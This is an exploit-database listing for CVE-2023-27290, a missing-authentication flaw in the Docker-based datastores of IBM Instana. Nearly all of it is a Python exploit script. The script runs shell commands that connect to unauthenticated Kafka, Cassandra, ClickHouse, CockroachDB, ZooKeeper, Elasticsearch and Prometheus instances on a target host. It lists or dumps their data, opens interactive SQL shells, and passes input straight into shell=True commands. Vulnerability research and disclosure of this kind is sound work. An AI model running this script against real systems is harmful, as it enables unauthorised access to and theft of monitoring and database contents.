Lucene search

K
packetstormShahid ParvezPACKETSTORM:171770
HistoryApr 10, 2023 - 12:00 a.m.

IBM Instana 243-0 Missing Authentication

2023-04-1000:00:00
Shahid Parvez
packetstormsecurity.com
155
ibm
instana
docker
authentication
exploit
datastores

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

0.001 Low

EPSS

Percentile

43.8%

`# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication   
# Google Dork: [if applicable]  
# Date: 06 March 2023  
# Exploit Author: Shahid Parvez (zippon)  
# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability  
# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana  
# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)  
# Tested on: [Mac os]  
# CVE : CVE-2023-27290  
import argparse  
import subprocess  
import pexpect  
  
# Define the available options and their corresponding commands  
COMMANDS = {  
"kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal",  
"cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'",  
"clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',  
"cockroach": "cockroach sql --host {host}:{port} --insecure",  
"zookeeper": "echo dump |ncat {host} {port}",  
"node-export": "curl http://{host}:{port}",  
"elasticsearch": "curl http://{host}:{port}/_cat/indices?v",  
"prometheus": "curl http://{host}:{port}/metrics",  
"clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'  
}  
  
# Define the parser for command-line arguments  
parser = argparse.ArgumentParser(description="Script to run various commands on a host.")  
parser.add_argument("host", help="The host IP address")  
parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")  
parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)")  
parser.add_argument("--output", help="Output the result to a file")  
parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")  
  
# Parse the command-line arguments  
args = parser.parse_args()  
  
# Determine the port number to use  
if args.port is None:  
if args.option == "cassandra":  
port = "9042"  
elif args.option == "clickhouse":  
port = "8123"  
elif args.option == "cockroach":  
port = "26257"  
elif args.option == "elasticsearch":  
port = "9200"  
elif args.option == "kafka":  
port = "9092"  
elif args.option == "node-export":  
port = "8181"  
elif args.option == "prometheus":  
port = "9090"  
elif args.option == "zookeeper":  
port = "2181"  
else:  
port = str(args.port)  
  
# Build the command to execute  
command = COMMANDS[args.option].format(host=args.host, port=port)  
  
# Print the command line if verbose option is provided  
if args.verbose:  
print(f"Executing command: {command}")  
  
# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell  
if args.option == "cassandra":  
child = pexpect.spawn(command)  
child.expect("Connected to.*", timeout=10)  
child.interact()  
output = child.before  
elif args.option == "cockroach":  
child = pexpect.spawn(command)  
child.expect("root@.*:", timeout=10)  
child.interact()  
output = child.before  
# If any other option is selected, execute the command and capture the output  
else:  
output = subprocess.check_output(command, shell=True)  
  
# If an output file is provided, write the output to the file  
if args.output:  
with open(args.output, "wb") as f:  
f.write(output)  
  
# Print the output to the console  
print(output.decode())  
  
  
`

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

0.001 Low

EPSS

Percentile

43.8%

Related for PACKETSTORM:171770